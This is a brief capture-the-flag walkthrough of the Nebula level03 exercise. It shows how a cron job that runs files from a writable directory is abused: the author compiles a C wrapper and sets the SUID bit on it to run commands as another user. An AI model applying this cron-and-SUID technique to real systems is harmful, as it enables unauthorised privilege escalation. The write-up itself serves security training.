http://exploit-exercises.com/nebula/level03
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03 . Files for this level can be found in /home/flag03.
Listing of the /home/flag03 looks like this:
$ ls
writable.d/ writeable.sh
After reading writeable.sh you’ll know that it basically executes any file within writeable.d/ with ulimit -t 5 limitation and then removes it.
The first thing that popped to my mind is to just try execute /bin/getflag but that didn’t work (technically it worked but you need to redirect your output).
However the easiest way to get the flag here is to write a little C wrapper for executing /bin/getflag and set SUID bit on the binary. (The way SUID works, basically, is that it lets the user run programs with the privileges of the owner of a file; So here
the owner is the process that actually compiled it and SUID let us run it).
Source code of the wrapper:
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
system("/bin/getflag");
return 0;
}
Next I created the file under writeable.d/ directory called foobar with following line
gcc /tmp/getflag.c -o getflag && chmod +s getflag
and waited couple of minutes for cron to do its job. After that you just need to run /home/flag03/getflag. Boom goes the dynamite.